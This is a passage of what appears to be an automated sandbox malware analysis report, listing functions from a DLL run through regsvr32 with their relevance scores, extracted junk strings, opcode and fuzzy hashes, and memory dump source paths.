                                • Opcode ID: f1f9fac336b8da8ff6122659e216f65e6467f6a7eb6b837c99e1b7255e82ae59
                                • Instruction ID: b98bb35d41bec71e3509b0825005519e10211f24d4dcfaaa5e415a9a600f37b2
                                • Opcode Fuzzy Hash: f1f9fac336b8da8ff6122659e216f65e6467f6a7eb6b837c99e1b7255e82ae59
                                • Instruction Fuzzy Hash: 7761D97060478C9FDBB9CF54D8857DE3AA1FB46344F60851AA88E8A250CFB45788CB43
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180023B48 Relevance: 2.6, Strings: 2, Instructions: 115COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 10W$ra"
                                • API String ID: 0-3432184507
                                • Opcode ID: fd02e9085198f1ee23cd325c43483fe701dbbe4b729f3c21db55c4e968cbf284
                                • Instruction ID: 1603a0fb70214c4199dc1879cc592ce20ce94242888b692f3a5634201c3c6fcf
                                • Opcode Fuzzy Hash: fd02e9085198f1ee23cd325c43483fe701dbbe4b729f3c21db55c4e968cbf284
                                • Instruction Fuzzy Hash: 215106B1D0070E8BCF48DFA5C48A5EEBFB1FB58358F218109E815A6260D7B49695CFC4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018000E06C Relevance: 2.6, Strings: 2, Instructions: 111COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Dm"i$e
                                • API String ID: 0-579088429
                                • Opcode ID: 1da592fe1c5b87024080557b40311a255aea64fd983cac56dc8e0bfd413ff1a3
                                • Instruction ID: ff289f4c4decf21b808411560f97a6ae0bbfde48fa9fd21a36285b9362365cbb
                                • Opcode Fuzzy Hash: 1da592fe1c5b87024080557b40311a255aea64fd983cac56dc8e0bfd413ff1a3
                                • Instruction Fuzzy Hash: 1251A1B180038ECFCF88CF68D8865CE7BB0FF58358F105A19E865A6260D3B49664CF95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180016088 Relevance: 2.6, Strings: 2, Instructions: 102COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: . 9$j~F
                                • API String ID: 0-3982525500
                                • Opcode ID: 8e27ed3e49b3a332b1e9bdfaf9f41fe9f17daf01a485ce033b7626c7aaf20959
                                • Instruction ID: 73f587e096f547b5323f36eeea6c902c11c99e62676f2e49b342c8d806439c0b
                                • Opcode Fuzzy Hash: 8e27ed3e49b3a332b1e9bdfaf9f41fe9f17daf01a485ce033b7626c7aaf20959
                                • Instruction Fuzzy Hash: C951E3B190034A8FCF48CF68C5864EE7FB1FB58398F50461DE85AAA250D37896A4CFC5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018001CABC Relevance: 2.6, Strings: 2, Instructions: 98COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: <>$u_"
                                • API String ID: 0-3712044913
                                • Opcode ID: 54a7279f070d6e0e1cb936a4c41fbfa7e6deebc7b08f576cf545ddb7c45c5dbd
                                • Instruction ID: 00705162336351badf1f89c020232bf89398a1e9550ad3a4c6adce9a79b90856
                                • Opcode Fuzzy Hash: 54a7279f070d6e0e1cb936a4c41fbfa7e6deebc7b08f576cf545ddb7c45c5dbd
                                • Instruction Fuzzy Hash: FC51BFB090034E8FCB48CF69D48A5DE7FB1FB58398F104619E856AA250D37496A8CBC5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180011CCC Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Wm$`W
                                • API String ID: 0-829970788
                                • Opcode ID: 1814abb82c64624d0c82e6b0c2fd8fef1d44b2e07111184ee76eb17802e65ade
                                • Instruction ID: 3e5335a01fca1db20c73b4a4a46b2fe43dbf21032e81bd0b2231691c24575172
                                • Opcode Fuzzy Hash: 1814abb82c64624d0c82e6b0c2fd8fef1d44b2e07111184ee76eb17802e65ade
                                • Instruction Fuzzy Hash: F041C070D1461C8FCF48DFA9D886ADDBBB0FB48304F20821DE456B6260C7789948CF69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018002B1D4 Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 7M$kJz
                                • API String ID: 0-1286445197
                                • Opcode ID: 98bdb79501751698457a0c63b58abd008b0bb4ffe469ed6aba7912a1c6e09250
                                • Instruction ID: 73e64fa095a73a4e7c26ce88557ae34d60ddb43780546a58e46c5e1049f230da
                                • Opcode Fuzzy Hash: 98bdb79501751698457a0c63b58abd008b0bb4ffe469ed6aba7912a1c6e09250
                                • Instruction Fuzzy Hash: E441D5B180034E9FCB48CF68D48A5DEBFB0FB58398F118619F815AA260D7B49694CFC5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180029C6C Relevance: 2.6, Strings: 2, Instructions: 90COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: NKi$gJk
                                • API String ID: 0-746334108
                                • Opcode ID: 58a5bce911c0f09ef1344d541f8e13db5683852ad3f58203c0096be295061b76
                                • Instruction ID: 370847f9a3576a2127be3913012de96f7d2fcf003f6ba5f8aec55f91b5c1372d
                                • Opcode Fuzzy Hash: 58a5bce911c0f09ef1344d541f8e13db5683852ad3f58203c0096be295061b76
                                • Instruction Fuzzy Hash: AD41C3B091034A8FCB48CF68C48A5DE7FF0FB28398F104619E815A6250D37496A8CFD5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018000FC8C Relevance: 2.6, Strings: 2, Instructions: 86COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 97"$lND
                                • API String ID: 0-255837067
                                • Opcode ID: 9f2144797edb960c4800540d43b86211ccc900e5f41a7482899803b998be048c
                                • Instruction ID: fdd228a39bc21f447827aa5875072745b1c1c90cd936de3499e4094daaa9051d
                                • Opcode Fuzzy Hash: 9f2144797edb960c4800540d43b86211ccc900e5f41a7482899803b998be048c
                                • Instruction Fuzzy Hash: 2F41D4B080038E8FCB48CFA8D8865DE7BF0FB48358F504609E86AA6250D7B49665CF95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180025374 Relevance: 2.6, Strings: 2, Instructions: 80COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: <\$P
                                • API String ID: 0-3329260309
                                • Opcode ID: 58da91c3c3294d218300734e2334eac2d42de78c76df722d29d8bba67d1a0edb
                                • Instruction ID: 7a6472800a972813acd2230f771f615073e8df7510407cf225569f4894f6b0d7
                                • Opcode Fuzzy Hash: 58da91c3c3294d218300734e2334eac2d42de78c76df722d29d8bba67d1a0edb
                                • Instruction Fuzzy Hash: AC41A2B181034DCFDB44CF68C88A5DE7FF0FB58358F104619E869A6250D7B89698CF95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000001800083F8 Relevance: 2.6, Strings: 2, Instructions: 77COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: &Z];$j,
                                • API String ID: 0-1323350831
                                • Opcode ID: 0816880f4d87a32c826b6eaf935fab6bcbeafe9302e1cf1b19fce18330a9178f
                                • Instruction ID: 4d52acf51d445db6beda3a26974f1176594abf5478927dcbf805cd9d8e8fa18c
                                • Opcode Fuzzy Hash: 0816880f4d87a32c826b6eaf935fab6bcbeafe9302e1cf1b19fce18330a9178f
                                • Instruction Fuzzy Hash: 9F31DEB190074E8BCF48DF24C88A1DE3BA1FB28798F50461DFC5696250D7B4D6A4CBC4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180026C80 Relevance: 2.6, Strings: 2, Instructions: 72COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 'd=$Y6C
                                • API String ID: 0-2002142494
                                • Opcode ID: fd35d43619dc3a263a01b5f940063c5335a5c98091513a5ed1770b6a4388dd96
                                • Instruction ID: ccf6aaa63b1aa8c6b30d000549e8006a3e599278b8e3fc9790a4e3cb01e02506
                                • Opcode Fuzzy Hash: fd35d43619dc3a263a01b5f940063c5335a5c98091513a5ed1770b6a4388dd96
                                • Instruction Fuzzy Hash: 744191B190034E9FCB44CFA8D48A5DEBFF0FB58398F205619E81AA6250D3B49694CFD5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180010250 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 27A$Cm)X
                                • API String ID: 0-3608389941
                                • Opcode ID: e0490a94f28e6ce23732593848f5f9e9112bddaf8c3b402d699b48d1b456956c
                                • Instruction ID: 684b918ddde8746cffb287e87a4350d0062747792986074a3c358ea6f2ed809a
                                • Opcode Fuzzy Hash: e0490a94f28e6ce23732593848f5f9e9112bddaf8c3b402d699b48d1b456956c
                                • Instruction Fuzzy Hash: 15316FB46187848B8348DF28D59551ABBE5FBCC308F404B2DF4CAAB360D778D644CB4A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018000E8F0 Relevance: 2.6, Strings: 2, Instructions: 65COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ?oCf$Wu
                                • API String ID: 0-2445847193
                                • Opcode ID: b07007c7df8fdcff1a3a12132ff18166943f80f753e521aa0974c7cb649c130d
                                • Instruction ID: 6e752a1dbd70b7d88cda0fb1d20915d08c65693f2945daa64a17bfbf07288bfe
                                • Opcode Fuzzy Hash: b07007c7df8fdcff1a3a12132ff18166943f80f753e521aa0974c7cb649c130d
                                • Instruction Fuzzy Hash: 5E21AEB55187848B83489F28C44A41ABBE0FB8C70DF504B2DF8DAA6260D778D646CB4B
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018001586C Relevance: 2.6, Strings: 2, Instructions: 61COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0F6 $KO
                                • API String ID: 0-276686719
                                • Opcode ID: 6205ceb11bb6b662748add8c297f1b443fa17d6724776aa75fc58f5dae511f0b
                                • Instruction ID: 15a0bfab9284e0424f8d805b4637dfad6d31782236c6d70db9798c35a47a8228
                                • Opcode Fuzzy Hash: 6205ceb11bb6b662748add8c297f1b443fa17d6724776aa75fc58f5dae511f0b
                                • Instruction Fuzzy Hash: AB21AD755283808FC368DF68C58614BBBF0FB86748F504A1DFAC686261D7B6D805CB47
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000001800226E0 Relevance: 2.6, Strings: 2, Instructions: 55COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: p$tSA
                                • API String ID: 0-3551818358
                                • Opcode ID: 99011765d78b2b4d15352d42fcf875ddc55d3d35c100f7abdde6317782da955f
                                • Instruction ID: dafa682f426fd7c4027cc0dc28289443c8a7082daafb3c1476061bf3b97c4e55
                                • Opcode Fuzzy Hash: 99011765d78b2b4d15352d42fcf875ddc55d3d35c100f7abdde6317782da955f
                                • Instruction Fuzzy Hash: 4A2169B45183858BD788DF28C54A50BBBE0BBCD74CF400B2DF4CAA6260D378D644CB4A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180017BA8 Relevance: 2.5, Strings: 2, Instructions: 45COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 8r.F$P?
                                • API String ID: 0-1060054278
                                • Opcode ID: 69901aac6ce1aef3d4959f7919bc5ecc16501e8ce7d01dbb2ce958a2c67dc727
                                • Instruction ID: b2da1e8a0f89ffdbcd525e428a91df6a678b185604bab408c7dee67f2374b2b0
                                • Opcode Fuzzy Hash: 69901aac6ce1aef3d4959f7919bc5ecc16501e8ce7d01dbb2ce958a2c67dc727
                                • Instruction Fuzzy Hash: DC2179B45187849BC749DF68D44A41ABBE0BB9C71CF800B5DF4CAAA310D3B8D645CB4A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018002490C Relevance: 1.8, Strings: 1, Instructions: 516COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: <>
                                • API String ID: 0-1927776135
                                • Opcode ID: 37c3f39876e999beb0937df684067ca5812f0cda9578e561258942df6de8421c
                                • Instruction ID: 9b9c084f2c1b1f08cb5858c99f1f27cbdd47ca95557f3058ff07422eb4e47033
                                • Opcode Fuzzy Hash: 37c3f39876e999beb0937df684067ca5812f0cda9578e561258942df6de8421c
                                • Instruction Fuzzy Hash: F742047190438C9BDBB9CFA8D8CA6DD7BB0FB58314F20421DD80A9B261DB745A85CF85
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180023DDC Relevance: 1.5, Strings: 1, Instructions: 283COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: j=
                                • API String ID: 0-592141216
                                • Opcode ID: 1169f1869d3fb428bfdad968f94ee3f32c89471e58a558a0d80dd63f76afa428
                                • Instruction ID: 9003355423bafd58b5275d98cfc2247977288ca0e37ad1cbcdd73f3390e5cf1b
                                • Opcode Fuzzy Hash: 1169f1869d3fb428bfdad968f94ee3f32c89471e58a558a0d80dd63f76afa428
                                • Instruction Fuzzy Hash: 6BD1397150074D8BDF89DF28C89A6DE3BA0FB58398F55522CFC4AA6250C778D998CBC4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018001ABE8 Relevance: 1.5, Strings: 1, Instructions: 247COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !O
                                • API String ID: 0-2378650393
                                • Opcode ID: 302dfdcfbb7bb296299c3bc274bc73d8feb87790668f515a7c841834ed93dc2b
                                • Instruction ID: 4170ec84c9d3f49002394f5178db7bb3edfe66952fd3c2890134f0e6da5031b0
                                • Opcode Fuzzy Hash: 302dfdcfbb7bb296299c3bc274bc73d8feb87790668f515a7c841834ed93dc2b
                                • Instruction Fuzzy Hash: F2E10A711087C88BDBFADF64C88ABDE3BACFB44748F105519EA0A9E258CB745748CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018001100C Relevance: 1.5, Strings: 1, Instructions: 222COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ^Lu
                                • API String ID: 0-3854589714
                                • Opcode ID: fb3768cccb7a26f6a89fbcd18e8308750f02c0f1f73e9d8b382492f454794486
                                • Instruction ID: 7c859a126a25bd0c02bef77f14247f717a5a9adcaacfb9e6f8c6730b8303fd88
                                • Opcode Fuzzy Hash: fb3768cccb7a26f6a89fbcd18e8308750f02c0f1f73e9d8b382492f454794486
                                • Instruction Fuzzy Hash: E4A128709047498FCB9DCF68C88A6EEBBF1FF48384F204119EA46A7250D7759A85CB81
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180007634 Relevance: 1.4, Strings: 1, Instructions: 183COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Z"
                                • API String ID: 0-1896177830
                                • Opcode ID: 85f6676341921d6f483625aa17b45c04f6466e2be55beb334fa49e51010a1540
                                • Instruction ID: 91163448777d7afc4cc80e296cb9cfbd8772b1902329242c75d45222aab24025
                                • Opcode Fuzzy Hash: 85f6676341921d6f483625aa17b45c04f6466e2be55beb334fa49e51010a1540
                                • Instruction Fuzzy Hash: C0A165B590060DCFCBA8CF78D15A68E7BF1BB04308F606129EC269A262E774D619CF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180028394 Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: e8f2
                                • API String ID: 0-4239716772
                                • Opcode ID: 3907476c53bac25a555e3ffc467f8b6ad850bf32927a98fe31c8bf9de770097f
                                • Instruction ID: aaec5001b0b3f576b33a9a86a913a78c3f9fdfa8ed470970e8cb6047951b043a
                                • Opcode Fuzzy Hash: 3907476c53bac25a555e3ffc467f8b6ad850bf32927a98fe31c8bf9de770097f
                                • Instruction Fuzzy Hash: C491C37010078E8BDF49DF24D89A5DA3BA1FB58348F114618FC5A97294C7B8EA65CBC4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180004264 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Qhm
                                • API String ID: 0-202924511
                                • Opcode ID: a2bb8b1411107b7575902c6661116fd2ce5bfac275bcbff6451e16fcd58631a3
                                • Instruction ID: dff427aa29f5729145b0ab8b996757c093157db28b416262619acb8c77b37c14
                                • Opcode Fuzzy Hash: a2bb8b1411107b7575902c6661116fd2ce5bfac275bcbff6451e16fcd58631a3
                                • Instruction Fuzzy Hash: 1D511479517209CBCB69CF38D4D56E93BE0EF68344F20012DFC668B2A2DB70D5268B48
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018000796C Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: WZ'
                                • API String ID: 0-1944904082
                                • Opcode ID: 8b55f411d49b287bdfafef9dc47725f2bb274e5ab4be629ead2bc2b735d307b3
                                • Instruction ID: 5b5aaaf1f09ca5557c90149fa64bb16396cbc43774f49a57b3b09e68a9cf408c
                                • Opcode Fuzzy Hash: 8b55f411d49b287bdfafef9dc47725f2bb274e5ab4be629ead2bc2b735d307b3
                                • Instruction Fuzzy Hash: F171087155878CDBDBBADF28C8897D937B1FB98304F908219D80E8E254DB785B4ACB41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018001303C Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: -]
                                • API String ID: 0-3195032325
                                • Opcode ID: 2f387ab0a9f756c6099ceefcc45306d74e879ef7c324eb87884d154b92a960fc
                                • Instruction ID: 01c3c27378e714c100c9a801295078fc99e5b088b1ed4129002e73aaaa485763
                                • Opcode Fuzzy Hash: 2f387ab0a9f756c6099ceefcc45306d74e879ef7c324eb87884d154b92a960fc
                                • Instruction Fuzzy Hash: 0151297010064D8BCB49DF28D4855D93FE1FB0C3ACF1A6318FD4AAA251D774D989CB88
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180018DBC Relevance: 1.4, Strings: 1, Instructions: 141COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: }4}
                                • API String ID: 0-922147943
                                • Opcode ID: 13f685bfa53c13813d4a1c5d0eb0e1f62a0b1129b8c138172dc2148ffb4c9b25
                                • Instruction ID: d7790a4c64fa8f9a696ea70ce14f4ff71b76161c227bc6b72ade158e86aff98b
                                • Opcode Fuzzy Hash: 13f685bfa53c13813d4a1c5d0eb0e1f62a0b1129b8c138172dc2148ffb4c9b25
                                • Instruction Fuzzy Hash: 3461F2B090075D8FCF48DFA4C88A5EEBBB0FB18348F114219E849B6250D7789A09CF95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018000F2DC Relevance: 1.4, Strings: 1, Instructions: 136COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: J_H
                                • API String ID: 0-3345504573
                                • Opcode ID: 917d428dc0055415592351f28073fdc95282f2729562562c1ca0dc8b4505919e
                                • Instruction ID: 228b1474463df3943694e07488ce24e2c321c70e95dbe7fca5aca48057557888
                                • Opcode Fuzzy Hash: 917d428dc0055415592351f28073fdc95282f2729562562c1ca0dc8b4505919e
                                • Instruction Fuzzy Hash: EE71E3B1904789CBDBB9DFA4C8896DDBBB0FB48344F20421EDC5AAB251DBB45685CF01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180007F74 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 6p
                                • API String ID: 0-4149211260
                                • Opcode ID: 2ce6c019f8e175d8f04f96ba0abbac2df009c59e7d0a66d8d52c33c4e2d2dbc2
                                • Instruction ID: 4bbd446beaef8e149afb4be24994101fb76057089ac3c5e28d57a25dd33f9813
                                • Opcode Fuzzy Hash: 2ce6c019f8e175d8f04f96ba0abbac2df009c59e7d0a66d8d52c33c4e2d2dbc2
                                • Instruction Fuzzy Hash: 5D512670D0470E8FDBA5CFA4C4863EEBBF0FB58344F208519E155B6251C7789A498BD6
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180019900 Relevance: 1.4, Strings: 1, Instructions: 120COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: o-b
                                • API String ID: 0-1062997908
                                • Opcode ID: 576a5f5008345344db0b8e3d8b9e4c65842e933aac756182c5b50859cc037c1c
                                • Instruction ID: 42124e7df8dcd8895505725edc86312d8ed31e4959f5f45477de907a66349d68
                                • Opcode Fuzzy Hash: 576a5f5008345344db0b8e3d8b9e4c65842e933aac756182c5b50859cc037c1c
                                • Instruction Fuzzy Hash: 5951177050064D8BDB94DF58C48A6DE3BE0FB28398F254219FC4AA6250D7789699CBC5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180008534 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: >(O
                                • API String ID: 0-1787487011
